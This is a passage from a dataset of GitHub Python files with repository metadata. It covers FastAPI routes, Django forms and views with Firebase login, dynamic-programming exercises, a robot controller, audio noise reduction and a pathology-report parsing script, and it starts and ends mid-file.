Session\n\nfrom db.database import get_db\nimport schemas\nfrom db import crud\n\nrouter = APIRouter(prefix=\"/users\", tags=[\"user\"])\n\n\n@router.get(\"/\", response_model=list[schemas.UserInfo])\nasync def read_users_id(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n \"\"\"Read all users ids.\"\"\"\n items = crud.get_all_users(db, skip=skip, limit=limit)\n if len(items) == 0:\n raise HTTPException(status_code=404, detail=\"Users not found\")\n return items\n\n\n@router.get(\n \"/{telegram_id}\", response_model=schemas.UserEdit, status_code=status.HTTP_200_OK\n)\nasync def read_user(telegram_id: int, db: Session = Depends(get_db)):\n \"\"\"Read user by telegram id without list of sent articles.\"\"\"\n db_user = crud.get_user(db, user_telegram_id=telegram_id)\n if db_user is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND, detail=\"User not found\"\n )\n return db_user\n\n\n@router.get(\"/{telegram_id}/articles\", response_model=schemas.UserArticlesSentView)\nasync def read_user_with_sent_articles(telegram_id: int, db: Session = Depends(get_db)):\n \"\"\"Get user info with a list of sent articles matching language code and user_telegram_id.\"\"\"\n db_articles = crud.get_user(db, user_telegram_id=telegram_id)\n if db_articles is None:\n raise HTTPException(status_code=404, detail=\"User not found\")\n return db_articles\n","repo_name":"VetalM84/fastApiKafkaBot","sub_path":"routers/users_get.py","file_name":"users_get.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"29888259932","text":"import numpy as np\r\nimport math\r\nimport pandas as pd\r\n\r\ndf=pd.read_csv(\"A2Q2Data_train.csv\", sep=',',header=None)#The dataset is imported\r\n#please change the location of the file to that in the local computer\r\ndataset = df.to_numpy()\r\n\r\ny=dataset[:,100]\r\nX=dataset[:,0:100]\r\n\r\n\r\nX=np.transpose(X) #here the data points are in rows, this statement converts them to column notation\r\ny=np.transpose(y)\r\nw_ml=np.matmul(np.matmul((np.linalg.pinv(np.matmul(X,np.transpose(X)))),X),y)#The analytical solution for w_ml is directly used\r\nprint(w_ml)\r\n\r\n\r\n","repo_name":"Keshkrish/Machine-Learning-Algorithms","sub_path":"Linear_regression_analytically.py","file_name":"Linear_regression_analytically.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16828075786","text":"from django.forms import ModelForm\nfrom .models import Entry\nfrom preferences import preferences\nfrom django.utils import timezone\nfrom django import forms\n\nclass EntryForm(ModelForm):\n class Meta:\n model = Entry\n fields = ['entry_date', 'destination', 'notes', 'odo_start', 'odo_end']\n widgets = {\n 'entry_date': forms.DateTimeInput(attrs={'placeholder': 'M/D/YYYY'}, format=\"%m/%d/%y\"),\n }\n \n def save(self, request, commit=True):\n obj = super().save(commit=False)\n obj.user = request.user\n obj.pub_date = timezone.now().date()\n obj.pay_period_start = obj.get_start_of_pay_period_date()\n obj.pay_period_end = obj.get_end_of_pay_period_date()\n \n if 'save' in request.POST:\n obj.draft = False\n elif 'save_as_draft' in request.POST:\n obj.draft = True\n\n if commit:\n obj.save()\n else:\n return obj\n ","repo_name":"jacksonfoster4/mileage_tfw","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6963442278","text":"class Solution:\n\n # important question review\n # how to explore new properties to reduce time complexity\n # method in math without dp\n # need further optimizing\n def superEggDrop(self, K: int, N: int) -> int:\n f = lambda x, a, b: x if a <= b else x + 1\n ans = [[0 for _ in range(K+1)] for _ in range(N+1)]\n for n in range(1, N+1):\n ans[n][1] = n\n for k in range(2, K+1):\n ans[1][k] = 1\n ans[min(2, N)][k] = min(2, N)\n ans[min(3, N)][k] = min(2, N)\n for k in range(2, K+1):\n x = 1\n for n in range(4, N+1):\n x = f(x, max(ans[x-1][k-1], ans[n-x][k]), max(ans[x][k-1], ans[n-x-1][k]))\n ans[n][k] = max(ans[x-1][k-1], ans[n-x][k] + 1)\n return ans[-1][-1]\n\n\nsol = Solution()\nprint(sol.superEggDrop(3, 1000))\n","repo_name":"ParkerMa1879/leetCode","sub_path":"Hard/Q887/SuperEggDrop.py","file_name":"SuperEggDrop.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34776032974","text":"# 백준 2294\n# 골드 5 / 동전 2\nimport sys\n\nn, k = map(int,sys.stdin.readline().split())\n\ndp = [float('inf') for _ in range(k+1)]\ncoin_set = set([])\nfor _ in range(n) :\n coin = int(sys.stdin.readline().strip())\n if coin > k :\n continue\n coin_set.add(coin)\n # 초기값 설정\n dp[coin] = 1\n\nfor i in range(1, k+1) :\n for item in coin_set :\n if i - item >= 1 :\n dp[i] = min(dp[i], dp[i-item] + 1)\n\nif dp[k] == float('inf') :\n print(-1)\nelse :\n print(dp[k])","repo_name":"leeyej-i/algorithm","sub_path":"DP/2294.py","file_name":"2294.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43124762703","text":"from main.helpers import update_monument, format_monument, search_commons_url, search_commons_wlm\nfrom main.wiki_api import execute_query\nfrom django.core.management.base import BaseCommand, CommandError\nfrom main.models import Monument, CategorySnapshot\n\n\nclass Command(BaseCommand):\n help = 'Takes new snapshot'\n\n def add_arguments(self, parser):\n parser.add_argument('id', type=int)\n\n def handle(self, *args, **options):\n\n m = Monument.objects.get(pk=options['id'])\n print(m.relevant_images)\n\n for relevant_image_url in m.relevant_images:\n relevant_images_data = search_commons_url(relevant_image_url)\n print(relevant_images_data)\n\n if m.wlm_n:\n wlm_images_data = search_commons_wlm(m.wlm_n)\n print(len(wlm_images_data))\n\n \n","repo_name":"densitydesign/wlm-backend","sub_path":"server/wlm/main/management/commands/update_monument_pictures.py","file_name":"update_monument_pictures.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74433260580","text":"import pandas as pd\nfrom pandas import DataFrame\nfrom base_etl import BaseETL\nfrom nltk.tokenize import LineTokenizer\nfrom functools import reduce\nline_tokenizer = LineTokenizer()\n\nclass GeneticStep02(BaseETL):\n\n def run(\n self,\n ):\n sql = \"SELECT * FROM gc_protocol.genetic_step_01 WHERE nullif(병리진단,'') is not null;\"\n df = self.df_from_sql(db_name=\"gc_protocol\", sql=sql)\n\n data = df.set_index(\"원무접수ID\")\n \n\n data_li = data.values.tolist()\n index_li = data.index.tolist()\n x = len(data_li)\n\n print(x)\n\n for j in range(1,15):\n exec(f\"A{j} = list(0 for i in range(0,x))\")\n \n\n for i in range(0,x):\n string = ''.join(data_li[i])\n list_void = line_tokenizer.tokenize(string)\n for j in range(1,15):\n exec(f\"A{j}[i] = []\")\n exec(f\"A{j}[i].append(index_li[i])\")\n for word in list_void:\n word_low = word.lower()\n if 'c-erb-b2' in word_low:\n eval(\"A1[i].append(word)\")\n if 'e-cadherin' in word_low:\n eval('A2[i].append(word)')\n if 'p53' in word_low:\n eval('A3[i].append(word)')\n if 'ki 67' in word_low:\n eval('A4[i].append(word)')\n if 'ki-67' in word_low:\n eval('A4[i].append(word)')\n if 'cd31 and d2-40' in word_low:\n eval('A5[i].append(word)')\n if 'c-kit' in word_low:\n eval('A6[i].append(word)')\n if 'cd34' in word_low:\n eval('A7[i].append(word)')\n if 'pkc-theta' in word_low:\n eval('A8[i].append(word)')\n if 's-100 protein' in word_low:\n eval('A9[i].append(word)')\n if 'a-sma' in word_low:\n eval('A10[i].append(word)')\n if 'smooth muscle actin' in word_low:\n eval('A10[i].append(word)')\n if 'ck' in word_low:\n eval('A11[i].append(word)')\n if 'chromogranin' in word_low:\n eval('A12[i].append(word)')\n if 'ebv' in word_low:\n eval('A13[i].append(word)')\n if 'giemsa' in word_low:\n eval('A14[i].append(word)')\n \n for j in range(1,15):\n exec(f\"dataA{j}=DataFrame(A{j})\")\n \n\n print(eval(\"dataA1\"))\n print(eval(\"dataA2\"))\n print(eval(\"dataA3\"))\n print(eval(\"dataA4\"))\n print(eval(\"dataA5\"))\n print(eval(\"dataA6\"))\n print(eval(\"dataA7\"))\n print(eval(\"dataA8\"))\n print(eval(\"dataA9\"))\n print(eval(\"dataA10\"))\n print(eval(\"dataA11\"))\n print(eval(\"dataA12\"))\n print(eval(\"dataA13\"))\n print(eval(\"dataA14\"))\n eval(\"dataA1.rename(columns={0:'원무접수ID',1:'HER2',2:'HER2_2'},inplace=True)\")\n eval(\"dataA2.rename(columns={0:'원무접수ID',1:'E_Cadherin',2:'E_Cadherin_2',3:'E_Cadherin_3', 4:'E_Cadherin_4'},inplace=True)\")\n eval(\"dataA3.rename(columns={0:'원무접수ID',1:'p53',2:'p53_2'},inplace=True)\")\n eval(\"dataA4.rename(columns={0:'원무접수ID',1:'Ki_67',2:'Ki_67_2',3:'Ki_67_3'},inplace=True)\")\n eval(\"dataA5.rename(columns={0:'원무접수ID',1:'CD31_N_D2_40'},inplace=True)\")\n eval(\"dataA6.rename(columns={0:'원무접수ID',1:'C_kit',2:'C_kit_2'},inplace=True)\")\n eval(\"dataA7.rename(columns={0:'원무접수ID',1:'CD34',2:'CD34_2'},inplace=True)\")\n eval(\"dataA8.rename(columns={0:'원무접수ID',1:'PKC_theta',2:'PKC_theta_2'},inplace=True)\")\n eval(\"dataA9.rename(columns={0:'원무접수ID',1:'s_100',2:'s_100_2',3:'s_100_3'},inplace=True)\")\n eval(\"dataA10.rename(columns={0:'원무접수ID',1:'SMA',2:'SMA_2'},inplace=True)\")\n eval(\"dataA11.rename(columns={0:'원무접수ID',1:'CK',2:'CK_2',3:'CK_3'},inplace=True)\")\n eval(\"dataA12.rename(columns={0:'원무접수ID',1:'Chromogranin',2:'Chromogranin_2'},inplace=True)\")\n eval(\"dataA13.rename(columns={0:'원무접수ID',1:'EBV',2:'EBV_2',3:'EBV_3'},inplace=True)\")\n eval(\"dataA14.rename(columns={0:'원무접수ID',1:'Giemsa',2:'Giemsa_2'},inplace=True)\")\n\n dfs=[eval(\"dataA1\"), eval(\"dataA2\"), eval(\"dataA3\"), eval(\"dataA4\"), eval(\"dataA5\"), eval(\"dataA6\"), eval(\"dataA7\"), eval(\"dataA8\"), eval(\"dataA9\"), eval(\"dataA10\"), \n eval(\"dataA11\"), eval(\"dataA12\"), eval(\"dataA13\"), eval(\"dataA14\")]\n data = reduce(lambda left, right: pd.merge(left, right, on='원무접수ID'), dfs)\n data1 = data.drop_duplicates()\n \n print(data1)\n data1.to_excel('C:/Users/Hyunjeong Ki/Gastric_Cancer_xlsx/genetic_step_02.xlsx')\n self.insert(data1, db_name=\"gc_protocol\", tb_name=\"genetic_step_02\")\n\n\nif __name__ == \"__main__\":\n obj = GeneticStep02()\n obj.run()","repo_name":"CNUHGILAB/Gastric_Cancer","sub_path":"Pathology_OD/Genetic_Step_02 copy.py","file_name":"Genetic_Step_02 copy.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35461253946","text":"from .base import FunctionalTest\n\nfrom unittest import skip\n#\n\nclass ItemValiddationaTets(FunctionalTest):\n\n def test_cannot_add_empty_lists_items(self):\n # 伊迪丝访问首页,不小心提交了一个空待办事项\n # 输入框中没输入内容,她就按下了回车键\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('\\n')\n # 首页刷新了,显示一个错误消息\n # 提示待办事项不能为空\n '''\n self.wait_for(lambda: self.assertEqual(\n self.browser.find_element_by_css_selector('.has-error').text,\n \"You can't have an empty list item\"\n )) \n \n '''\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:valid'\n ))\n # 她输入一些文字,然后再次提交,这次没问题了\n self.get_item_input_box().send_keys('Buy milk\\n')\n self.check_for_row_in_list_table('1:Buy milk')\n # 她有点儿调皮,又提交了一个空待办事项\n self.get_item_input_box().send_keys('\\n')\n # 在清单页面她看到了一个类似的错误消息\n self.check_for_row_in_list_table('1:Buy milk')\n '''\n self.wait_for(lambda: self.assertEqual(\n self.browser.find_element_by_css_selector('.has-error').text,\n \"You can't have an empty list item\"\n )) \n \n '''\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:invalid'\n ))\n # 输入文字之后就没问题了\n self.get_item_input_box().send_keys('Buy tea\\n')\n self.check_for_row_in_list_table('1:Buy milk')\n self.check_for_row_in_list_table('2:Buy tea')\n self.fail('write me')\n @skip\n def test_cannot_add_duplicate_item(self):\n # 伊迪丝访问首页,新建一个清单\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('Buy wellies\\n')\n self.check_for_row_in_list_table('1:Buy wellies')\n # 她不小心输入了一个重复的待办事项\n self.get_item_input_box().send_keys('Buy wellies\\n')\n # 她看到一条有帮助的错误消息\n self.check_for_row_in_list_table('1:Buy wellies')\n #error = self.browser.find_element_by_css_selector('.has-error')\n #self.assertEqual(error.text, \"You've already got this in your list\")\n self.wait_for(lambda: self.assertEqual(\n self.get_error_elemeent(),\n \"text You've already got this in your list\"\n ))\n\n def test_error_messages_are_cleared_on_input(self):\n #伊迪丝新建一个清单,但方法不当,所以出现了一个验证错误。\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('Buy wellies\\n')\n self.get_item_input_box().send_keys('Buy wellies\\n')\n error = self.get_error_elemeent()\n self.assertTrue(error.is_displayed())\n\n #为了消除错误,她开始在输入框中输入内容\n self.get_item_input_box().send_keys('a')\n #看到错误消息消失了,她很高兴\n error = self.get_error_elemeent()\n self.assertFalse(error.is_displayed())\n\n\n def get_error_elemeent(self):\n return self.browser.find_element_by_css_selector('.has-error')","repo_name":"sundhhy/TDD_Superlist","sub_path":"functional_tests/test_list_item_validation.py","file_name":"test_list_item_validation.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28693047084","text":"\"\"\"lab1_task2 controller.\"\"\"\n\n# FIGURE OUT WHATS WRONG WITH ANGLE AND WRITE READINGS TO FILE FOR PLOT AND DO ERROR MESSAGE\n\nfrom controller import Robot\nimport math\n\n# create the Robot instance.\nrobot = Robot()\n\n# get the time step of the current world.\ntimestep = int(robot.getBasicTimeStep())\n\n# X degrees (0 - 360) [Modify]\nX = 20\n# Y seconds [Modify]\nY = 1 \n\ndegreeDiff = 360 - X\n\n# getting the motors and setting position and velocity\nleftMotor = robot.getDevice('left wheel motor')\nrightMotor = robot.getDevice('right wheel motor')\nleftMotor.setPosition(float('inf'))\nrightMotor.setPosition(float('inf'))\nleftMotor.setVelocity(0)\nrightMotor.setVelocity(0)\n\n# getting the position sensors\nleftposition_sensor = robot.getDevice('left wheel sensor')\nrightposition_sensor = robot.getDevice('right wheel sensor')\nleftposition_sensor.enable(timestep)\nrightposition_sensor.enable(timestep)\n\nimu = robot.getDevice('inertial unit')\nimu.enable(timestep)\nrobot.step(timestep)\n\n# function to convert from degrees to radians\ndef degreesToRadians(deg):\n return (deg * math.pi / 180) \n \n# function to convert from radians to degrees\ndef radiansToDegrees(rad):\n return ((rad + math.pi) * 180) / math.pi\n \ndistBetweenWheels = 2.28 \ndmid = distBetweenWheels / 2\nwheelRad = 0.8\nwheelCircum = 2 * wheelRad * math.pi\n\nXrad = degreesToRadians(X)\n\ndistanceLeft = Xrad * -dmid\ndistanceRight = Xrad * dmid\n\nvelocityLeft = distanceLeft / Y\nvelocityRight = distanceRight / Y\n\nphiLeft = velocityLeft / wheelRad\nphiRight = velocityRight / wheelRad\n\nangularVelocity = Xrad / Y\n\nprint(phiLeft)\nprint(phiRight)\n\nif (phiRight > 6.28):\n print (\"Error: Velocity exceeds 6.28\")\n exit()\n\ntime_start = robot.getTime()\n\nfile = open(\"lab1_task2_measurements.txt\", \"w\")\nfile.write(\"Angle:\\tTime:\\n\")\n\nleftMotor.setVelocity(phiLeft)\nrightMotor.setVelocity(phiRight)\n\n# main loop\nwhile robot.step(timestep) != -1 and (robot.getTime() - time_start < Y):\n\n leftMotor.setVelocity(phiLeft)\n rightMotor.setVelocity(phiRight)\n\n print(\"time: \" + str(robot.getTime() - time_start))\n print(\"degrees: \" + str(radiansToDegrees(imu.getRollPitchYaw()[2])))\n file.write(str(radiansToDegrees(imu.getRollPitchYaw()[2])) + \"\\t\" + str(robot.getTime() - time_start)+ \"\\n\")\n\nleftMotor.setVelocity(0)\nrightMotor.setVelocity(0)\n","repo_name":"bilaljoud/MobileRobotsLabs","sub_path":"Lab1/lab1_task2.py","file_name":"lab1_task2.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1243474701","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import ModelForm\nfrom apps.userprofile.models import SiteUser\nfrom apps.compo.models import Team\n\ndummy = []\n\n\nclass RegisterTeamForm(ModelForm):\n # teamname = forms.CharField(label='Lagnavn', max_length=30)\n # username = forms.ModelMultipleChoiceField(dummy)\n # action_url = 'add_team'\n class Meta:\n model = Team\n exclude = ('teamleader',)\n\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop(\"request\")\n tour = kwargs.pop(\"tour\")\n super(RegisterTeamForm, self).__init__(*args, **kwargs)\n unwanted_users = [self.request.user]\n for user in SiteUser.objects.all():\n if user.is_teamleader.filter(participant__tournament=tour) or \\\n user.is_teammember.filter(participant__tournament=tour):\n unwanted_users.append(user)\n self.fields['members'].queryset = SiteUser.objects.exclude(id__in=[o.id for o in unwanted_users])\n\n\nclass ChallongeForm(forms.Form):\n initial = 0\n CHOICES = (\n (u'single elimination', u'single elimination'),\n (u'double elimination', u'double elimination'),\n (u'round robin', u'round robin'),\n (u'swiss', u'swiss'),\n )\n type = forms.ChoiceField(choices=CHOICES, label=\"Challonge-type\")\n\n","repo_name":"kradalby/lanweb","sub_path":"apps/compo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70043980901","text":"import streamlit as st\nfrom mplsoccer import Pitch\n\nclass Pitch_class():\n def create_pitch(self, row_count=None, column_count=None):\n if row_count is None:\n st.set_option('deprecation.showPyplotGlobalUse', False)\n pitch = Pitch(pitch_type='statsbomb', line_color='#000009')\n fig, ax = pitch.draw(figsize=(16, 11),constrained_layout=True, tight_layout=False)\n return pitch, fig, ax\n \n else:\n st.set_option('deprecation.showPyplotGlobalUse', False)\n pitch = Pitch(pitch_type='statsbomb', line_color='#000009', line_zorder=row_count+column_count+2, linewidth=1)\n fig, axs = pitch.grid(nrows=row_count, ncols=column_count, figheight=3 * (row_count+column_count),\n axis=False, endnote_height=0, title_height=0)\n return pitch, fig, axs\n \ndef add_locations(df):\n x = []; y = []\n for i, row in df.iterrows():\n x.append(row['location'][0])\n y.append(row['location'][1])\n df['x'] = x\n df['y'] = y\n return df\n\n#changes array elements by their cumuluative sum\ndef nums_cumulative_sum(nums_list):\n return [sum(nums_list[ :i+1]) for i in range(len(nums_list))]","repo_name":"berkanyuce/FIFA-World-Cup-2018-Visualization-and-Prediction","sub_path":"codes/utilites/utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"7152414899","text":"int1 = int(input())\r\nint2 = int(input())\r\nint3 = int(input())\r\n\r\nif int1 > int2 and int1 > int3:\r\n print(int1)\r\nelif int2 > int1 and int2 > int3:\r\n print(int2)\r\nelif int3 > int2 and int3 > int1:\r\n print(int3)\r\n","repo_name":"danielfilev/SoftUni","sub_path":"Fundamentals/Basic Syntax, Conditional Statements and Loops/Lab/02.largest_of_three_numbers.py","file_name":"02.largest_of_three_numbers.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37973374926","text":"from django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport functools\nimport json\nimport os\nimport pyrebase\n \nfrom ppw.data.relational_queries import (\n accession_trend_by_time_query, active_inactive_investidors_query,\n age_distribution_query, carreer_investidor_activity_year_query,\n city_with_most_investidors_query, civil_status_investidors_activity_query,\n investidors_genre_query, most_common_job_query,\n state_with_most_investidors_query, top_3_most_common_jobs_query)\n \nconfig = {\n \"apiKey\": \"AIzaSyBWocM1wzV1lZh64h-IF1Owo-A3u8zrYlk\",\n \"authDomain\": \"projeto-ppw.firebaseapp.com\",\n \"databaseURL\": \"https://projeto-ppw-default-rtdb.firebaseio.com\",\n \"projectId\": \"projeto-ppw\",\n \"storageBucket\": \"projeto-ppw.appspot.com\",\n \"messagingSenderId\": \"1021347829402\",\n \"appId\": \"1:1021347829402:web:84b85d7e00f6956dbd3123\"\n}\n \n# Initialising database,auth and firebase for further use\nfirebase=pyrebase.initialize_app(config)\nauthe = firebase.auth()\ndatabase=firebase.database()\nPREFIX = 'Bearer '\n\ndef get_token(header):\n if not header.startswith(PREFIX):\n raise ValueError('Invalid token')\n return header[len(PREFIX):]\n\ndef check_user_auth(view_func):\n @functools.wraps(view_func)\n @csrf_exempt\n def wrapper(request, *args, **kwargs):\n if 'token' not in request.session:\n return _build_response({\"result\": \"error - user must be logged\"})\n return view_func(request)\n return wrapper\n \n@csrf_exempt\ndef signup(request):\n data = json.loads(request.body)\n email = data['email']\n passs = data['pass']\n try:\n user = authe.create_user_with_email_and_password(email, passs)\n request.session['token'] = user['localId']\n except Exception as ex:\n print (ex)\n return _build_response({\"result\": \"error to sign up\"})\n return _build_response({\"result\": \"success\"})\n\n@csrf_exempt\ndef login(request):\n data = json.loads(request.body)\n email = data['email']\n pasw = data['pass']\n try:\n user = authe.sign_in_with_email_and_password(email,pasw)\n except Exception as ex:\n print (ex)\n return _build_response({\"error\": \"invalid credentials\"})\n session_id = user['idToken']\n request.session['token'] = str(session_id)\n return _build_response({\"token\": session_id})\n\n@check_user_auth\ndef age_distribution_view(request):\n age_min = request.GET.get('age_min', 18)\n age_max = request.GET.get('age_max', 100)\n age_distribution = list(age_distribution_query(age_min, age_max))\n return _build_response(age_distribution)\n \n@check_user_auth\ndef top_3_most_common_jobs_view(request):\n top_job = list(top_3_most_common_jobs_query())\n return _build_response(top_job)\n \n@check_user_auth\ndef active_inactive_investidors_view(request):\n active_inactive_data = list(active_inactive_investidors_query())\n return _build_response(active_inactive_data)\n \n@check_user_auth\ndef state_most_investidors_lives_view(request):\n state_most_investidors = list(state_with_most_investidors_query())\n return _build_response(state_most_investidors)\n \n@check_user_auth\ndef city_most_investidors_lives_view(request):\n state = request.GET.get('state')\n city_most_investidors = list(city_with_most_investidors_query(state))\n return _build_response(city_most_investidors)\n \n@check_user_auth\ndef investidors_genre_view(request):\n age = request.GET.get('age')\n investidors_genre = list(investidors_genre_query(age))\n return _build_response(investidors_genre)\n \n@check_user_auth\ndef accession_trend_view(request):\n accession_trend = list(accession_trend_by_time_query())\n print (accession_trend)\n return _build_response(accession_trend)\n \n@check_user_auth\ndef most_common_carrer_view(request):\n most_common_job = list(most_common_job_query())\n return _build_response(most_common_job)\n \n@check_user_auth\ndef investidor_carreer_year_view(request):\n activity_investidor_carreer = list(carreer_investidor_activity_year_query())\n return _build_response(activity_investidor_carreer)\n \n@check_user_auth\ndef civil_status_investidors_activity_view(request):\n civil_status_investidors = list(civil_status_investidors_activity_query())\n return _build_response(civil_status_investidors)\n \ndef _build_response(result):\n return JsonResponse({'result': result})\n ","repo_name":"manoelvlm/projeto-ppw","sub_path":"api/ppw/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29508727799","text":"import librosa\nfrom pysndfx import AudioEffectsChain\nimport numpy as np\nimport math\nimport scipy\n\n\ndef read_file(file_name):\n sample_file = file_name\n sample_path = sample_file\n\n y, sr = librosa.load(sample_path, None)\n\n return y, sr\n\n\ndef reduce_noise_power(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = round(np.median(cent)) * 1.5\n threshold_l = round(np.median(cent)) * 0.1\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-30.0, frequency=threshold_l, slope=0.8)\\\n .highshelf(gain=-12.0, frequency=threshold_h, slope=0.5)\n y_clean = less_noise(y)\n\n return y_clean\n\n\ndef reduce_noise_centroid_s(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = np.max(cent)\n threshold_l = np.min(cent)\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-12.0, frequency=threshold_l, slope=0.5)\\\n .highshelf(gain=-12.0, frequency=threshold_h, slope=0.5)\\\n .limiter(gain=6.0)\n\n y_cleaned = less_noise(y)\n\n return y_cleaned\n\n\ndef reduce_noise_centroid_mb(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = np.max(cent)\n threshold_l = np.min(cent)\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-30.0, frequency=threshold_l, slope=0.5)\\\n .highshelf(gain=-30.0, frequency=threshold_h, slope=0.5)\\\n .limiter(gain=10.0)\n y_cleaned = less_noise(y)\n\n cent_cleaned = librosa.feature.spectral_centroid(y=y_cleaned, sr=sr)\n columns, rows = cent_cleaned.shape\n boost_h = math.floor(rows / 3 * 2)\n\n boost_bass = AudioEffectsChain().lowshelf(gain=16.0, frequency=boost_h, slope=0.5)\n y_clean_boosted = boost_bass(y_cleaned)\n\n return y_clean_boosted\n\n\ndef reduce_noise_median(y):\n \"\"\"\n :param y: audio matrix\n :return: audio matrix after gain reduction on noise\n \"\"\"\n y = scipy.signal.medfilt(y, 3)\n return y\n\n\ndef trim_silence(y):\n \"\"\"\n :param y:\n :return: audio matrix with less silence and the amount of time that was trimmed\n \"\"\"\n y_trimmed, index = librosa.effects.trim(y, top_db=20, frame_length=2, hop_length=10)\n trimmed_length = librosa.get_duration(y) - librosa.get_duration(y_trimmed)\n\n return y_trimmed, trimmed_length\n\n\ndef enhance(y):\n \"\"\"\n :param y: audio matrix\n :return: audio matrix after audio manipulation\n \"\"\"\n apply_audio_effects = AudioEffectsChain()\\\n .lowshelf(gain=10.0, frequency=260, slope=0.1)\\\n .reverb(reverberance=25, hf_damping=5, room_scale=5, stereo_depth=50, pre_delay=20, wet_gain=0, wet_only=False)\n y_enhanced = apply_audio_effects(y)\n\n return y_enhanced\n\n\ndef output_file(destination, file_name, y, sr, ext=\"\"):\n \"\"\"\n generates a wav file\n :param destination:\n :param file_name:\n :param y:\n :param sr:\n :param ext:\n :return: None\n \"\"\"\n destination = destination + file_name.split(\"/\")[-1][:-4] + ext + '.wav'\n librosa.output.write_wav(destination, y, sr)\n","repo_name":"YunhoJung/tobigs-rhapsody-speech-synthesis","sub_path":"augmentation/reduct_noise.py","file_name":"reduct_noise.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71907688100","text":"import logging\nimport os\n\nimport pandas as pd\nfrom decide import data_folder\nfrom decide.data.database import connection, Manager\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\n\n\ndef write_result(conn, iterations, model_run_id, output_directory):\n\n df = pd.read_sql(\"\"\"\n SELECT \n a.p as p,\n a.issue as issue, \n a.repetion || '-' || a.iteration as pointer, \n a.numerator / a.denominator AS nbs\n FROM (SELECT\n sum(ai.position * ai.power * ai.salience) AS numerator,\n sum(ai.salience * ai.power) AS denominator,\n r.pointer AS repetion,\n i2.pointer AS iteration,\n m.p,\n i.name as issue\n FROM actorissue ai\n LEFT JOIN issue i ON ai.issue_id = i.id\n LEFT JOIN actor a ON ai.actor_id = a.id\n LEFT JOIN iteration i2 ON ai.iteration_id = i2.id\n LEFT JOIN repetition r ON i2.repetition_id = r.id\n LEFT JOIN modelrun m ON r.model_run_id = m.id \n WHERE ai.type = 'after' AND i2.pointer = ? AND m.id = ? \n GROUP BY m.id,r.id, i2.id, i.id) a\n \"\"\",\n conn,\n params=(iterations, model_run_id, ),\n index_col=['p'],\n columns=['issue']\n )\n\n for p in sorted(set(df.index)):\n x = df.loc[p].pivot(index='pointer', columns='issue', values='nbs').cov().round(5)\n\n x.to_csv(os.path.join(output_directory, 'covariance.equal-{}.csv'.format(p)))\n\n logging.info('writen covariance table for p={}'.format(p))\n\n\nif __name__ == '__main__':\n m = Manager(os.environ.get('DATABASE_URL'))\n m.init_database()\n\n model_run_id = 1\n\n write_result(connection, model_run_id, data_folder)\n","repo_name":"foarsitter/decide-exchange-model","sub_path":"decide/results/covariance.py","file_name":"covariance.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"24715521621","text":"import grequests\nimport math\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nimport aiosqlite\nimport asyncio\nimport random\nfrom discord import Webhook, 